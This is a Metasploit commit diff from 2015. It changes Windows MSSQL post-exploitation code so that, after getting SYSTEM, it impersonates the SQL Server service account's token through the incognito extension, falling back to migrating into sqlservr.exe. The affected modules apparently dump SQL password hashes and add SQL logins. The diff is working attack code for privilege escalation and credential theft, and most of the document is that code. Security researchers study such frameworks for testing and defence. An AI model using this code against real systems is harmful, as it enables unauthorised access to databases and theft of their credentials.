Use incognito token stealing rather than process migration if we have

the privileges required for successful impersonation.
bug/bundler_fix
Meatballs 2015-02-24 23:14:49 +00:00
parent 9c2219124c
commit 99f79e8533
3 changed files with 65 additions and 39 deletions

View File

@ -100,10 +100,32 @@ module MSSQL
def impersonate_sql_user(service) def impersonate_sql_user(service)
pid = service[:pid] pid = service[:pid]
vprint_status("Current user: #{session.sys.config.getuid}") vprint_status("Current user: #{session.sys.config.getuid}")
current_privs = client.sys.config.getprivs
if current_privs.include?('SeImpersonatePrivilege') ||
current_privs.include?('SeTcbPrivilege') ||
current_privs.include?('SeAssignPrimaryTokenPrivilege')
username = nil
session.sys.process.each_process do |process|
if process['pid'] == pid
username = process['user']
break
end
end
session.core.use('incognito') unless session.incognito
vprint_status("Attemping to impersonate user: #{username}")
res = session.incognito.incognito_impersonate_token(username)
if res =~ /Successfully/i
print_good("Impersonated user: #{username}")
return true
else
return false
end
else
# Attempt to migrate to target sqlservr.exe process # Attempt to migrate to target sqlservr.exe process
# Migrating works, but I can't rev2self after its complete # Migrating works, but I can't rev2self after its complete
print_warning("Attempting to migrate to process #{pid}...") print_warning("No SeImpersonatePrivilege, attempting to migrate to process #{pid}...")
begin begin
session.core.migrate(pid) session.core.migrate(pid)
rescue Rex::RuntimeError => e rescue Rex::RuntimeError => e
@ -113,6 +135,7 @@ module MSSQL
vprint_status("Current user: #{session.sys.config.getuid}") vprint_status("Current user: #{session.sys.config.getuid}")
print_good("Successfully migrated to sqlservr.exe process #{pid}") print_good("Successfully migrated to sqlservr.exe process #{pid}")
end
true true
end end

View File

@ -47,6 +47,7 @@ class Metasploit3 < Msf::Post
system_status = get_system system_status = get_system
fail_with(Exploit::Failure::Unknown, 'Unable to get SYSTEM') unless system_status fail_with(Exploit::Failure::Unknown, 'Unable to get SYSTEM') unless system_status
begin
service = check_for_sqlserver(instance) service = check_for_sqlserver(instance)
fail_with(Exploit::Failure::Unknown, 'Unable to identify MSSQL Service') unless service fail_with(Exploit::Failure::Unknown, 'Unable to identify MSSQL Service') unless service
@ -61,10 +62,11 @@ class Metasploit3 < Msf::Post
get_sql_hash(instance_name) get_sql_hash(instance_name)
end end
end end
ensure
# return to original priv context # return to original priv context
session.sys.config.revert_to_self session.sys.config.revert_to_self
end end
end
def get_sql_version(instance_name) def get_sql_version(instance_name)
vprint_status("Attempting to get version...") vprint_status("Attempting to get version...")

View File

@ -6,7 +6,7 @@
require 'msf/core' require 'msf/core'
require 'rex' require 'rex'
require 'msf/core/post/windows/mssql' require 'msf/core/post/windows/mssql'
load '/home/ben/git/metasploit-framework/lib/msf/core/post/windows/mssql.rb'
class Metasploit3 < Msf::Post class Metasploit3 < Msf::Post
include Msf::Post::Windows::MSSQL include Msf::Post::Windows::MSSQL
@ -56,7 +56,7 @@ class Metasploit3 < Msf::Post
# Get LocalSystem privileges # Get LocalSystem privileges
system_status = get_system system_status = get_system
fail_with(Exploit::Failure::Unknown, 'Unable to get SYSTEM') unless system_status fail_with(Exploit::Failure::Unknown, 'Unable to get SYSTEM') unless system_status
begin
service = check_for_sqlserver(instance) service = check_for_sqlserver(instance)
fail_with(Exploit::Failure::Unknown, 'Unable to identify MSSQL Service') unless service fail_with(Exploit::Failure::Unknown, 'Unable to identify MSSQL Service') unless service
@ -68,10 +68,11 @@ class Metasploit3 < Msf::Post
else else
add_login(service, instance_name) add_login(service, instance_name)
end end
ensure
# attempt to return to original priv context # attempt to return to original priv context
session.sys.config.revert_to_self session.sys.config.revert_to_self
end end
end
def add_login(service, instance_name) def add_login(service, instance_name)
begin begin